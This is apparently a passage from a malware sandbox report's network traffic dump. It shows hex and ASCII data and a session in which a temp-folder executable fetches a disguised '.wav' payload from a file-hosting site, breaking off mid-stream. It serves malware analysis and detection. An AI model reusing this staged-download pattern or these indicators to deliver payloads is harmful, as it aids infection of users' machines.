b3 ed 49 9c f5 ac 8e ac 4e 31 e5 4a 1d a8 2f cc 5c 7a ba 29 76 36 c3 6f 76 cd 21 02 fa 1a b6 79 7d 27 3a 37 8b df da 2f d2 35 e5 c6 25 af be 87 21 8b 78 e3 Data Ascii: B%V52x)\]UxaqYTIuNdgGKj^qXU3T)tOZL!()1J8Rc8&$l9axEkdYCnw^B]Lxp\|lTEo@oIN1J/\z)v6ov!y}':7/5%!x
2023-07-26 23:33:42 UTC	656	IN	Data Raw: 9e 4a 41 92 52 e8 eb a4 53 23 0e 67 c8 ae 45 27 ed 75 82 7c 8b 34 2c b9 27 b4 a7 53 68 f7 a1 64 6c 20 95 f5 9d 33 4e bd cf 1c 3c 4e 5f 3a a0 67 ff f4 28 dc aa 18 aa 37 95 f8 e3 a5 13 c3 d1 50 18 f1 25 b8 d6 79 47 fe a9 1d 7c 13 5a ef f6 23 5c 33 ad bc d3 28 fa ea fe f9 b5 d2 8a 62 84 f0 e7 e1 9c 57 89 6a 48 77 83 20 13 24 3d 09 7b 4b 06 b6 c8 4f 1c 64 2e 42 4c d2 19 bd 7b 9d e5 5f 66 af a6 bc 4a 1c 53 d4 44 6b eb 73 4c 18 5e 9f 81 7a 19 b8 8c c7 bf 83 d9 08 8b 5b 89 2f 28 da 4f 06 a6 1b a3 25 62 78 bd a4 48 50 47 43 80 8c 2a 81 22 c8 e9 f4 b0 9f 93 dc 07 08 65 96 c2 9f d5 bb d6 cf f1 56 27 12 50 1e fc ac 9b 25 73 52 f7 e3 8e b6 b2 0d 8b 15 e4 a9 06 e2 0c 3c 5d 33 48 8c b5 fa 49 ee 82 c7 38 f6 ab 84 02 f2 e2 15 7e ea 5b 19 06 2a ff c9 8a 10 3d 39 d7 77 06 Data Ascii: JARS#gE'u\|4,'Shdl 3N<N_:g(7P%yG\|Z#\3(bWjHw $={KOd.BL{_fJSDksL^z[/(O%bxHPGC"eV'P%sR<]3HI8~[=9w
2023-07-26 23:33:42 UTC	672	IN	Data Raw: a3 ae 60 79 e6 2f ed c3 a6 48 91 10 4f c0 6a 73 1f 32 ca d3 c1 58 29 fd 40 a4 13 b0 6a e8 ec 0e 43 34 0d 67 35 6e 8d dc 5d ec 35 30 11 2a 31 cd 57 9f 4a d9 45 01 ac 3c 7f 71 f0 ab 90 a4 8c 2d 01 2a da 8b 59 bc 6f 9e fc 15 11 29 c0 8a 8e 58 08 9a 48 59 99 b3 3d 60 cf 9f 1e 33 19 89 54 30 8b 8a 52 94 de 34 09 3a a1 b6 60 17 76 d4 d1 51 38 2f 74 07 7e 15 6a dd 79 83 28 57 6d 82 40 f4 dd 2f 93 e8 41 57 38 04 f9 da 34 21 f5 67 37 b6 57 41 83 aa 2e de ee 65 f3 cc 08 92 49 f1 e3 87 cb a0 9a 87 06 43 9c a4 da d5 a8 fa 95 6c 2e 5f 17 64 40 ba ff 9d b9 1d 63 e3 4a c1 d4 9f 74 3e b3 a8 c4 16 c6 b3 aa c2 1e 76 5f a6 44 92 ae f7 4f 75 b4 d6 b1 8b 05 ad c1 4c 0b 6a e1 d8 21 53 11 66 d2 22 11 57 3f 7e b9 0a 86 ac 8d 4c c4 6d f6 f6 f4 1d 4d 0d 9e 4b f2 3e 57 b8 1b ff c6 Data Ascii: `y/HOjs2X)@jC4g5n]501WJE<q-Yo)XHY=`3T0R4:`vQ8/t~jy(Wm@/AW84!g7WA.eICl._d@cJt>v_DOuLj!Sf"W?~LmMK>W
2023-07-26 23:33:42 UTC	688	IN	Data Raw: 42 4d 45 00 cd 13 b1 08 d5 81 3d cc d3 d0 18 dc 54 75 84 37 24 3f 3b 54 d2 9c 5d 1f eb c9 63 eb 5e f9 7e eb 82 bc 6c 10 13 2c 08 e2 bf 32 30 e6 46 18 f4 6e 5c e0 c4 46 10 ce d7 69 13 38 d1 36 be c9 31 74 82 52 dc 82 32 ff 7a c6 df b9 85 bb c9 49 cb 88 10 f6 e5 77 24 f8 e7 d8 73 1f 4f f4 90 ef 15 a4 52 38 6b ae 7d aa 1f e0 5c 30 c7 15 79 43 56 93 84 91 a6 d9 3b 2f a2 2c 3a d8 78 d9 89 79 a5 c3 4c 61 30 0a b2 ca 5d 99 b4 57 b0 9a 48 4e 24 35 30 fb 47 43 53 d8 bd a9 66 36 54 cf 99 6e 60 1b c4 46 c9 23 e9 6d 2e 86 2a 95 b1 6f 3b 0e e3 ae 7e 99 6a 5b 2f c1 3c 31 45 da c9 e0 a3 2d ed 30 89 e0 94 2b 23 0d 4a bf 8e 94 36 06 32 6c d9 2f 99 16 3c cf c2 14 6c 06 d6 f0 15 a7 da 87 69 e5 2d 84 83 57 d8 ad 00 d6 27 60 17 e5 21 6f 43 0e 32 f3 b1 8b 7c 19 8a 77 70 54 7c Data Ascii: BME=Tu7$?;T]c^~l,20Fn\Fi861tR2zIw$sOR8k}\0yCV;/,:xyLa0]WHN$50GCSf6Tn`F#m.*o;~j[/<1E-0+#J62l/<li-W'`!oC2\|wpT\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	50304	108.181.20.35	443	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe

Timestamp	kBytes transferred	Direction	Data
2023-07-26 23:35:37 UTC	700	OUT	GET /pvcvd6.wav HTTP/1.1 Host: files.catbox.moe Connection: Keep-Alive
2023-07-26 23:35:38 UTC	700	IN	HTTP/1.1 200 OK Server: nginx/1.21.3 Date: Wed, 26 Jul 2023 23:35:37 GMT Content-Type: application/octet-stream Content-Length: 1523216 Last-Modified: Wed, 26 Jul 2023 10:58:49 GMT Connection: close ETag: "64c0fc69-173e10" X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self'; Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD Accept-Ranges: bytes
2023-07-26 23:35:38 UTC	700	IN	Data Raw: ad d0 a7 37 f4 f5 c7 0c 64 05 9f cf 4f aa e9 72 a9 47 2a 37 eb 9c d4 67 98 eb 2c 09 73 5a 71 88 b9 36 96 2d 52 28 55 d8 3e ce 8b 30 d1 81 7c 06 56 e8 df da 7f 8e de 8f bd 2a e6 6f 1b a7 f9 7f 8d bb 57 37 a0 60 5e 4f c6 9d 12 b9 9d 4b a6 3d 82 6b ca 50 ed b4 39 d8 27 67 37 17 97 6d f8 13 d9 83 af 2b e4 9d c1 f3 f7 56 07 7f b9 08 c8 6e 5a f5 9b 02 6d 56 84 68 8f 55 4d 00 bf 5b 7a 0b 5e 16 71 11 fc 49 e3 f7 d1 fb ce 27 8c 87 69 eb 92 ad 14 a2 88 51 b2 9b ce 05 a2 56 1c 77 89 9a 5c ec 05 66 4c 66 55 a8 05 cc d6 af 68 f0 db da 19 24 ab 1a 1d 0c a3 72 69 4e bc 4a 6b 37 18 03 3d 8b a7 96 ab f0 fc d5 98 83 71 13 70 18 c1 08 2a 17 ed ea c0 da 20 a3 d5 b8 2e 04 15 0f 8b a2 5c b1 07 70 7e ee 91 66 58 b9 8f df f2 a0 61 e0 e8 46 ed 49 7d b8 9e 66 c0 05 fa c8 9b 60 ea Data Ascii: 7dOrG7g,sZq6-R(U>0\|VoW7`^OK=kP9'g7m+VnZmVhUM[z^qI'iQVw\fLfUh$riNJk7=qp* .\p~fXaFI}f`
2023-07-26 23:35:38 UTC	716	IN	Data Raw: 15 87 95 87 2f 79 d4 b5 9f 15 a7 54 54 7f ef 8e dc f7 9c 2f 50 60 cb 25 8e 7b 90 5f 78 82 7b 04 be 77 0b 5c 24 c3 48 20 1f b8 2e e6 e3 e5 ec 81 4c 43 90 65 16 11 81 29 12 7d 3c 24 73 58 e0 82 b2 fa 2d 64 26 19 e7 2c 2f cb 2f 4b c4 7f fe 79 88 47 2c da 3a 65 3a 08 29 8d 3a 44 6b 8c 01 b5 3b 06 5e c3 57 39 e6 2a 82 0d 51 ac ac 93 75 93 9d 12 1a 78 77 13 fe f0 25 f5 3c a9 f9 c5 9b 5b 6a 3d f7 3c 58 d7 0b 4d 72 de e5 23 26 b6 8e a5 c5 6c c7 f4 6f 8b e9 36 bb fc 1c 95 70 5c db 4a fd d5 88 5e 08 97 46 ad 06 84 a4 07 5b c6 cd e1 07 27 a5 86 ab 14 0d 58 94 b2 c6 9a 1b 91 4c 68 65 26 7f f3 11 ce 22 dd 64 93 2e 41 b5 2c 49 7c 6f 7a 0c 53 d7 e8 0d 55 44 a0 75 36 04 4a 0e 69 dd c8 89 71 f0 93 fd a8 ce b5 c9 20 2b 97 f4 c3 d7 f3 41 4b 50 6f cd 23 75 d9 39 dd 8b 84 f3 Data Ascii: /yTT/P`%{_x{w\$H .LCe)}<$sX-d&,//KyG,:e:):Dk;^W9*Quxw%<[j=<XMr#&lo6p\J^F['XLhe&"d.A,I\|ozSUDu6Jiq +AKPo#u9
2023-07-26 23:35:38 UTC	732	IN	Data Raw: a1 30 81 dc d7 5d 2b f0 08 e5 37 ba d0 01 a5 4a f5 5b dc ee 7b b4 3d 8d 6b 80 af 03 a7 46 9e d6 81 0b 4c a1 7e 75 c1 76 51 1e a5 b3 57 18 58 e5 af 2f a2 8f cd 49 00 04 22 be a8 74 5e 1b 47 c2 37 26 85 5e 17 e4 0d 7f f1 4e 9d 82 b0 fd 13 69 f7 a8 5a 83 af 05 ed 34 63 80 0b 9f c1 c7 08 7c 9a 7e d1 9a 0d 77 cb 34 31 45 cf cc 22 96 9e 76 a0 b9 18 d9 7a 73 1c 3d b3 d0 c8 ac 06 bb 4f db d5 0d b8 02 55 52 88 30 f5 e0 9d 6f d4 9f 1e cb 4a ea d9 81 f0 f5 51 69 e7 7c d3 50 98 04 1c 2a 95 9b 2f 23 55 d9 b9 b5 30 a6 f1 23 cd f9 03 c3 84 4d 15 e4 bc 1d bb 7c b2 f0 e8 37 9e f3 d6 5a a9 00 7a 14 c5 5c d4 48 e9 6f 05 97 54 ef 31 cc 86 e0 b2 40 d6 94 2b a7 18 66 ae ba e4 4a 27 bc f5 1c 2e 03 ee 3c 88 8f 1c 80 5c f4 52 8f 9d c0 f5 05 55 c0 b6 17 1a 83 c9 30 dc 9e 6e 62 80 Data Ascii: 0]+7J[{=kFL~uvQWX/I"t^G7&^NiZ4c\|~w41E"vzs=OUR0oJQi\|P*/#U0#M\|7Zz\HoT1@+fJ'.<\RU0nb
2023-07-26 23:35:38 UTC	748	IN	Data Raw: 43 37 c6 76 b0 bc 68 fc 7a cc 87 c6 6b 4e 27 f6 b9 b8 fc 2f 96 0f 50 c5 7c 56 e0 d5 96 c7 a4 dc 92 63 ae 34 44 23 95 8f b0 a9 09 98 5f d6 fa 1f 04 a7 d5 c8 07 67 40 4d b4 ae 07 37 d4 3a 2d c2 db 3d b7 ff 45 95 b2 b0 de 91 d8 ad 89 73 0b f3 64 f2 66 1a b9 55 3c 0d 8e a4 50 a0 51 4d ca 68 d9 c9 e3 95 1c 84 3f 1e 1c 7f d0 67 34 3b 52 ce c6 bc 6f 87 e3 6c 8a fc 8f c7 4f 10 38 3b bf 13 ec a0 75 73 a4 8e cc 60 65 3d f7 d1 2a 93 2b 92 20 7a c9 f4 8c 18 85 3b f6 97 92 bb f1 9e a4 d3 06 4a df 39 a7 01 65 94 ef 9a b6 8e 84 b5 2f ad 3a 95 52 2b 8f 6c b0 c8 bd 41 21 c7 61 ff 8f b4 7d 5d 97 58 51 57 8d 3c 06 58 6b b8 23 3a 34 c7 69 b9 fb aa 59 ec 4a 0b d6 62 0c 50 fe 47 75 bf aa 6c b1 df 99 6f 9c 39 bd aa 4a 6d 43 a2 85 d1 87 8b c5 9a d6 95 3d 06 16 2b d4 a7 b5 86 45 Data Ascii: C7vhzkN'/P\|Vc4D#_g@M7:-=EsdfU<PQMh?g4;RolO8;us`e=*+ z;J9e/:R+lA!a}]XQW<Xk#:4iYJbPGulo9JmC=+E
2023-07-26 23:35:38 UTC	764	IN	Data Raw: 1e 0e f4 bc 54 34 05 aa 6b 4f 2d 90 5f be 6a 2e 4d 80 a3 54 04 b4 ed ae 77 c9 c6 d6 64 76 87 ef 51 ec 91 2f 46 ee f5 d4 98 78 8d 0a c2 ca 69 8b 0d e7 cb 33 b7 6b 59 90 7b f9 c7 10 d4 88 78 c6 db 93 d7 c6 25 e6 98 86 ef e6 0d a1 dc 3a 83 70 d1 47 6d 52 ad cb ce 04 f3 ff 76 3f 41 ce db 1c 0f 24 fa 16 a0 c2 16 31 c3 e1 6e 40 9b d9 60 82 2e 11 8e 20 04 80 3b c0 af 19 ff 15 6f 9d be e0 92 9f fb e7 84 20 24 87 3a a8 c4 1a cb 08 89 60 1e 12 8c 4f 67 37 d9 05 e0 f1 6d e0 5a d4 a1 7d e3 9c 2a 71 e8 30 8b 35 c3 e8 45 df 54 12 6c c5 14 af 1d 45 67 1f f7 d9 05 d7 be f1 b7 d1 d3 ed e7 51 ef 49 f9 ce f3 c7 a9 d4 1f e5 61 a9 ba 27 89 ed d8 4c c1 a8 92 22 34 52 75 37 2e 3c 67 57 43 81 c3 00 58 a2 3e 78 c8 05 67 a4 7c 8a b7 45 81 e3 38 af 64 91 44 0b 3f 64 a9 cf b1 ea 21 Data Ascii: T4kO-_j.MTwdvQ/Fxi3kY{x%:pGmRv?A$1n@`. ;o $:`Og7mZ}*q05ETlEgQIa'L"4Ru7.<gWCX>xg\|E8dD?d!
2023-07-26 23:35:38 UTC	780	IN	Data Raw: dc e3 95 f9 6b e7 ac 95 dd 46 9c 99 29 24 fd 3b b2 b7 dd de 92 94 d4 b4 22 07 2d 79 a4 53 82 49 17 88 82 e9 11 d0 fa 58 31 d0 60 6d b7 fe 18 ae 7f 3a c8 e7 7f cf 8b 7a 4c a0 63 0b 7e 29 e5 37 1d 6f 68 2e fa 56 3f 4f d6 ac 98 bb 3c 0e bd 42 b5 e0 77 72 a4 ff 58 a3 37 6b f6 08 d1 a8 11 54 54 b2 85 95 29 b7 db b4 21 2e b1 d8 7c 84 3d 7d 37 a8 03 e3 37 72 74 9c 7e ec fe 0a 53 da c2 5d c8 b5 fd 45 a7 22 7f 70 d1 6a 30 27 dd ce 69 50 b4 c7 f8 56 11 a9 e1 58 d7 0c 93 58 ad 25 93 73 4e 1c 2d 00 18 65 5b 3b c5 a2 4c 55 2c 0b f5 6e 27 41 ee 13 10 9c cd 4e 23 d9 b0 4a ed 64 66 22 8c 3a 16 99 c3 13 f0 56 46 42 4a 7e df 00 b5 30 cf 13 ea 07 2e c4 2f b2 7c 88 71 ad f4 d6 59 4c 41 3a ec 0b ec 4e 68 dc 2d e5 7e ce 04 19 2f a7 af 58 78 85 e5 bd 11 cc 9b 4f ae 81 c9 9f 6e Data Ascii: kF)$;"-ySIX1`m:zLc~)7oh.V?O<BwrX7kTT)!.\|=}77rt~S]E"pj0'iPVXX%sN-e[;LU,n'AN#Jdf":VFBJ~0./\|qYLA:Nh-~/XxOn
2023-07-26 23:35:38 UTC	796	IN	Data Raw: 56 70 94 a4 0d df 14 dd 09 f2 5d 55 f4 25 da 2f a9 bc d2 2f a2 1d 30 9f 6a fb b3 88 ec 65 dc 06 33 b7 27 ae e2 22 4d fd 8f 80 fb fe d1 e8 c4 8a 10 96 c9 44 d9 2f 68 f9 4f 94 00 c6 04 f7 62 99 b8 ee e0 38 2e 5b f4 3d 9d b7 46 89 21 48 f1 73 86 ac 58 ef ae 70 2c 13 4d 05 72 da a6 21 94 de f0 5b b0 a9 f5 ff 31 70 75 10 06 db 53 e8 eb 58 ba 00 8d 9f 7a 78 e2 e3 bb 6a 1e 0b f4 dd d1 9a 8d ed 0c 20 a4 22 a5 74 f8 6c 71 3f fd 4c 5b fa 90 31 af 6d d8 de 3e 37 b0 c7 26 e7 93 80 87 f8 84 c7 32 b1 24 fd 31 72 69 ed eb 25 52 aa 53 42 6b 8d e7 60 fd f2 48 58 18 9e 10 79 6f d5 8b ac 3d a7 b3 c8 28 f8 30 67 70 6e ed 81 3d 13 70 3b 9b f3 27 12 bc da 8c 9c da d5 59 a9 8d 59 3a 85 29 39 1e 63 44 dd 83 4e 3d 7b d4 8e 74 be 46 4d 13 ce d3 98 20 0f b3 b9 f8 47 04 78 20 1d 20 Data Ascii: Vp]U%//0je3'"MD/hOb8.[=F!HsXp,Mr![1puSXzxj "tlq?L[1m>7&2$1ri%RSBk`HXyo=(0gpn=p;'YY:)9cDN={tFM Gx
2023-07-26 23:35:38 UTC	812	IN	Data Raw: 22 42 e3 d0 0f 47 a1 bf 1b 55 db 98 13 5a 83 b3 3b 18 f5 d4 7c d5 cc 13 85 22 31 1c 8b 6b 55 88 7f 6b 35 38 8a a0 81 89 f7 2e 33 75 91 ab e6 81 f6 e3 20 a3 09 b8 31 17 9d f0 7f 31 50 4e 05 0a dd 9a 0e e8 cd be db 42 66 04 37 a7 38 b6 24 3c 66 c7 10 d3 15 9a be 11 43 19 27 09 06 3a eb 13 9a f1 24 5e cb 5a 4e 69 53 a2 6e c3 e5 f8 6f a7 d7 93 63 86 9c 83 cd 08 c9 39 11 58 c4 f7 e2 ba 18 8b 8c 37 cf 56 9b 29 61 f7 83 d0 4d 76 54 ee 28 80 93 cd f1 ee 0d 68 2e 07 97 6e c0 91 ad a5 e9 7f d3 64 0b d0 2d 79 bf 8e 9f e7 64 e7 81 95 8b f2 4a 02 2c 75 32 0c 6b 22 de 75 d2 de 98 e1 3d 86 94 7b cf fe 78 7c 3a 87 db 20 a3 3f 46 08 45 6e d8 ff c0 c8 fd 16 bc da 0a 09 df 8b 47 5a 66 02 45 2f 76 8a 7b a1 be 0c 8a 34 41 99 47 ba 2e 13 98 a1 7f d7 cc 97 37 4d 8e c9 0b 69 d7 Data Ascii: "BGUZ;\|"1kUk58.3u 11PNBf78$<fC':$^ZNiSnoc9X7V)aMvT(h.nd-ydJ,u2k"u={x\|: ?FEnGZfE/v{4AG.7Mi
2023-07-26 23:35:38 UTC	828	IN	Data Raw: d7 f0 31 00 a1 0a bc 49 87 60 ef e4 f0 e1 b3 1c 0c f3 da 28 33 36 62 a9 70 05 b4 f7 19 24 77 94 ea 13 20 55 16 68 fd 8c 45 8f 49 ed 02 9a 7b b5 33 cf ff 3e ed 09 1b 64 7d 1d f1 0a 88 0f d3 ff fb ae d2 88 69 6f fd 3e c0 da 10 1b f3 37 70 9f 3e bd 83 90 5f 5d 0a 02 7b 78 6a 05 78 ba bb 6d fb b4 f7 2a f1 ad 21 3a 36 ad e3 84 e5 65 e3 26 8c ca ae 68 a5 96 9e 0c bd 5f d5 63 54 d5 dd f7 93 0e a0 fb 5f fc ac 60 f5 a9 25 c6 40 0a 0d f9 89 fc 0f e8 75 85 87 9a 78 05 c9 ad 86 ae 2f 9a 89 a0 7e 97 86 09 f5 02 ed 37 e2 40 8b d7 3a c6 85 0e 0d 1d 2c bf e8 33 22 37 96 9e d0 35 92 9c f0 41 82 3b 5b 3c cb 3b 8f b9 07 6f 8c 53 5b c8 c1 58 e7 3e 07 38 2e 8c 7a 9f f0 42 60 7a 38 15 0b 86 a0 4c 41 89 a6 eb fd 86 f9 d4 ed 21 d9 5f 5e d3 c0 93 ef f5 1a de 1f d4 68 56 56 d0 86 Data Ascii: 1I`(36bp$w UhEI{3>d}io>7p>_]{xjxm*!:6e&h_cT_`%@ux/~7@:,3"75A;[<;oS[X>8.zB`z8LA!_^hVV
2023-07-26 23:35:38 UTC	844	IN	Data Raw: 16 e2 86 2f bb 42 bb 3a dd 38 dc 2a 1a 85 47 b6 47 3e 0b 9d 78 da 5f 22 b3 33 9a f7 d9 14 63 7a 31 16 03 09 45 01 90 ef 77 bf 00 20 c4 0b bf 55 17 3d 2f 78 58 c8 fc 9a cb ff 88 60 2c 07 98 50 92 0d c3 85 be ab e5 a8 79 83 4b 66 4d 6a ed dc c6 3c 86 ba a2 51 f7 98 d8 e6 0a 0e 0a 44 bd 40 05 a0 d4 e6 81 79 1a 1c b7 36 bc b9 99 ef 9b 6e 1a c4 98 26 d4 a3 24 92 af 54 e7 c8 d1 64 42 41 d2 df 0d cd 73 73 34 6f 65 0c f0 ea 9c e5 b1 63 e3 1e 83 f6 84 c7 36 61 b5 53 9a 73 b4 3a 79 9d bd 4b 5e c6 cf 72 03 03 db c1 fb ff 85 a7 5d d0 d9 44 6b bf c0 b8 65 9c 15 ca 35 07 fb d4 c9 ea 60 31 84 0f d1 a8 f6 ee 14 94 7b da ca 64 0c 25 7f 4c 1e 29 e2 1a 91 24 06 ea a5 57 e6 36 6e 36 a4 66 41 df c3 95 a6 18 a9 b1 ae ae c4 d7 ec 9b 3f c7 98 b3 95 3a 7e b9 ad 3a 52 19 78 84 73 Data Ascii: /B:8*GG>x_"3cz1Ew U=/xX`,PyKfMj<QD@y6n&$TdBAss4oec6aSs:yK^r]Dke5`1{d%L)$W6n6fA?:~:Rxs
2023-07-26 23:35:38 UTC	860	IN	Data Raw: 6e 92 53 c1 db 9c 86 dc 5f 1d fc 46 da d2 99 ec 41 03 0e a0 9f 01 50 7b a9 86 3c c9 10 c4 bf db c9 34 79 5e 12 1a 0d 60 4d a1 ae 7a 18 71 8f cc e5 8a 4c d0 b1 1d 57 26 65 0e c0 0b d1 e9 60 c9 95 61 30 2e 74 b3 9a ba 56 36 da 57 16 49 d0 2e 1e f8 44 12 f1 17 dd 9e 48 71 c7 3a 45 12 96 da 63 a0 7c e3 e0 e3 45 d5 95 c9 06 27 21 7b d6 87 10 4f 79 34 2d 61 ad 3e a1 ce a7 3e 0c 23 92 ba c0 80 ff f1 2f 7d dc 68 ad de f4 41 dc 5f ea 43 18 4b fb 2b 8a 07 ea 52 a1 ba f9 e1 23 a3 64 9e 08 20 b0 2e e8 38 ca 38 73 e1 8a 44 b8 c1 a7 c1 74 ab ad 30 f0 aa 69 cd 0b 46 a4 d1 b0 70 31 d1 ca a1 04 b9 6e d1 e7 c4 0d d1 b7 da 2b d8 f8 c8 b0 f8 63 fb 30 3f 3c 35 ea 16 b3 f0 00 38 f8 42 d2 79 dc 1f eb 78 92 ff 8e ce 3a 92 d6 79 20 44 d6 1d 51 79 3a 4c a3 d0 36 7c da 12 7b cf 5e Data Ascii: nS_FAP{<4y^`MzqLW&e`a0.tV6WI.DHq:Ec\|E'!{Oy4-a>>#/}hA_CK+R#d .88sDt0iFp1n+c0?<58Byx:y DQy:L6\|{^
2023-07-26 23:35:38 UTC	876	IN	Data Raw: 9d f2 85 34 ad 06 2b c7 43 58 ae 4e b7 42 d9 da c9 8b a8 43 5d 19 cc 2b b2 87 79 6d 41 8a 80 84 1a f9 08 0d d9 73 d1 e4 29 1f 1e e3 d3 73 b7 9e b9 b5 be 64 09 8b 14 dc dc 72 eb fd 10 a7 a0 14 8e 21 81 5b 67 14 5e d4 21 37 7b 3f f9 f7 5b 5b cc db a7 4b 4f 01 55 4a 19 e9 85 c8 cb 4a a5 23 95 84 05 2d d3 73 06 23 59 6b 13 73 ea 61 f7 e9 9b 90 75 dd 90 4a ab e9 77 55 3b a3 5a d9 db 77 a2 50 07 ab e8 bf c5 17 45 ff dd 39 80 d9 fa b8 41 e2 d5 1a 6e ec 0a e4 96 32 95 a1 a0 ec 51 b2 77 00 f0 b3 dd 8d e7 51 49 1a 68 18 1f 57 c8 46 30 89 a8 78 40 59 c6 3d 6f 36 8f a6 03 af 4f 34 bc 6b 7f a8 94 1a d3 49 23 30 30 f2 0e cf ff f0 e7 73 08 1c 9f 15 02 80 ad 81 d0 6f 55 da dc d3 18 7f d0 55 4e 1d 36 dd e4 66 57 b5 92 6d 84 35 d1 aa 63 29 11 68 a8 0d 14 19 8c c3 70 8a 66 Data Ascii: 4+CXNBC]+ymAs)sdr![g^!7{?[[KOUJJ#-s#YksauJwU;ZwPE9An2QwQIhWF0x@Y=o6O4kI#00soUUN6fWm5c)hpf
2023-07-26 23:35:38 UTC	892	IN	Data Raw: ca 41 5c d3 68 fa 79 a5 37 c8 ab 6c 0e ff 9e 28 0d e0 38 a6 d7 59 cc c2 72 c9 e9 c3 cf 1d 88 ba c8 a3 ac 66 e8 97 0b 38 fa b0 36 5f 38 c9 e6 9c 35 f5 2d 4c 3d cd 92 ca 45 65 f9 4f 73 a9 7e 46 9d 74 d9 60 9a 21 18 a7 e3 d9 f0 4b e5 ad 81 ca 6c da 05 43 c4 3b 43 d3 f3 ef 46 ff 2d 19 d2 8f 5d 99 e2 72 fa 5d 35 c6 3b 6c 0b 58 09 db 0a f6 0a 18 06 08 8c db fa 8c e8 02 ef 35 11 bd 90 d0 71 5d 50 0a ea 98 9a 3e 43 b9 c4 b6 7e 29 34 84 57 fa ba a1 a8 1e ee 87 31 e1 76 58 d1 4a df ba be 2f d5 2e 5a 5e 6a e7 66 7c d0 fd c9 35 d0 04 59 04 c0 e3 71 fc 66 4e 92 29 f4 1f 5d 8f 54 98 b6 4c c5 cf 5a 3c d0 cb d5 26 94 2a 4e b1 1f 10 91 0c 3f b8 73 fa 7c 82 c5 c2 c9 f7 52 eb 47 ba b1 c7 f5 76 b5 c6 33 24 b3 ab 93 71 20 64 61 6a b3 da 1c 28 de 6b fa 62 40 70 9d b9 81 e2 e2 Data Ascii: A\hy7l(8Yrf86_85-L=EeOs~Ft`!KlC;CF-]r]5;lX5q]P>C~)4W1vXJ/.Z^jf\|5YqfN)]TLZ<&*N?s\|RGv3$q daj(kb@p
2023-07-26 23:35:38 UTC	908	IN	Data Raw: c0 87 20 c7 dd cd 8a 8a a4 61 15 63 bc 32 04 96 98 2f a9 4d 59 c6 bf 30 9a 10 38 07 44 bc e9 d3 55 cb 53 5c 5d 00 12 43 33 4d 93 e4 f4 13 f6 04 96 59 cf 3a fb f6 56 1e b0 84 a6 96 7e d0 4b 1a 9b 95 7c a8 01 ce 4d 5b ac 35 28 8b 09 5f f0 32 ac 17 48 36 2b f8 10 89 58 ce e4 03 a4 0f 79 be bc 9e 28 b5 1e 91 8a 71 39 30 6e 58 ae 0c d1 48 5d e2 59 7f 35 6c d3 b7 ef 4f b7 73 d5 f0 e4 a2 f5 ef 90 3c e0 df d7 66 06 4c 01 71 dd a4 02 df 3c fd df ce 59 a4 d3 f6 89 04 92 4e f8 87 da 99 3e 00 fd d5 bc 74 e9 5b 4f 6a 98 9a 10 0b ad cd 6c 0e ee 58 b1 15 42 23 df 21 b4 34 c2 ef 3e 0f 61 e2 f2 d2 38 61 f7 d1 08 ce f1 cb 9d c9 5a d3 27 39 0c 47 64 27 8c 3f 23 21 a0 bf 9b 28 5b 51 31 7e ce 8a 71 93 56 ca 94 12 d1 01 2c 74 34 26 95 af ea 1f 1d ea 96 24 ef f2 86 5c 80 d2 c6 Data Ascii: ac2/MY08DUS\]C3MY:V~K\|M[5(_2H6+Xy(q90nXH]Y5lOs<fLq<YN>t[OjlXB#!4>a8aZ'9Gd'?#!([Q1~qV,t4&$\
2023-07-26 23:35:38 UTC	924	IN	Data Raw: 29 5a 2f 6e 9d 53 7d 1d 64 b0 73 17 c2 58 5d 98 e0 a9 43 17 cd b4 8f 3d 4e c6 be 09 4b 5b 1a 66 c8 ef e2 cf 65 cf 52 2b ee 33 12 0d 88 ee 21 71 22 fb 5d 7b 5d 6d 6f a3 63 14 26 93 63 b9 80 26 5c 59 85 54 e2 a4 a0 aa dc 6b 53 30 52 fb bf e0 f5 98 52 5d 58 81 b6 46 29 98 b6 ae 86 82 66 ea 42 1d 31 c7 8c c0 4f a8 ad 3c e6 1d 31 60 81 20 f7 6b b9 c5 01 9b 82 89 e7 0e 51 9b 20 18 59 52 80 10 58 24 3c ab 1f 97 2d 86 e9 37 24 dd 37 b0 1f da 3b 9d 65 83 51 5c a4 c3 22 df e3 b6 50 16 c0 9f 4c 5a bd 8b 17 e1 6e 7b 85 b2 40 89 32 f9 4d 90 3f 8a bb e3 a2 db 41 20 c4 c4 22 72 ef 85 99 d8 a2 1d 1a 94 43 2f 51 6e 93 48 61 43 0e 62 98 26 7d 2e 75 c1 8e 0d 25 bb 33 12 9b 61 a9 6f 34 20 26 09 6c 11 75 7d 15 e8 86 98 3f f5 8b 81 11 3d b5 9e a8 10 8e e1 e3 82 d2 dd 9a 0c e5 Data Ascii: )Z/nS}dsX]C=NK[feR+3!q"]{]moc&c&\YTkS0RR]XF)fB1O<1` kQ YRX$<-7$7;eQ\"PLZn{@2M?A "rC/QnHaCb&}.u%3ao4 &lu}?=
2023-07-26 23:35:38 UTC	940	IN	Data Raw: fa e5 e0 48 d6 d7 a2 66 66 6f 83 62 84 1d 6c d5 84 c5 26 ca 23 69 79 39 b5 e6 bc 07 b1 85 d3 88 09 07 b2 82 9e 3c 28 71 ad a3 c5 a5 83 3a f0 51 99 df 1a 2f a1 bc 65 12 89 ce 01 af 1c dc c5 ce bc 5f ea ac 3d f4 4f 98 4e 02 c9 e1 10 c9 d2 40 2e 41 43 07 95 a6 50 8b ed f0 ba 7e 27 70 40 40 21 9f 6c 7f 44 ce 51 b6 9a fc 6b 06 f0 54 e4 1c fd f7 68 aa 6b 17 34 34 20 c6 92 10 62 57 5b f3 27 55 c8 d7 3a 21 39 59 a0 0c 39 ed 66 f4 ce 8a 7e 3f a2 20 74 78 fb dc 97 2b 6b a2 ff b4 a6 9d 5c 6a f5 a0 2d 12 18 ea a3 31 77 fe 0d 7e cb d5 83 eb ef df 92 de ed 77 46 84 34 57 fb 2a 82 0a 7f ae c0 11 7e 9e 81 0b bc 88 9c 20 a3 d7 f9 ec 52 0a 43 b3 be d5 6b 7a 17 64 37 81 cb 54 90 89 d4 1f c7 97 6d 86 b1 d4 22 f9 89 04 e1 d4 6c 9d 42 22 30 fc 09 0e c1 33 24 e5 6c 7b 40 ec 58 Data Ascii: 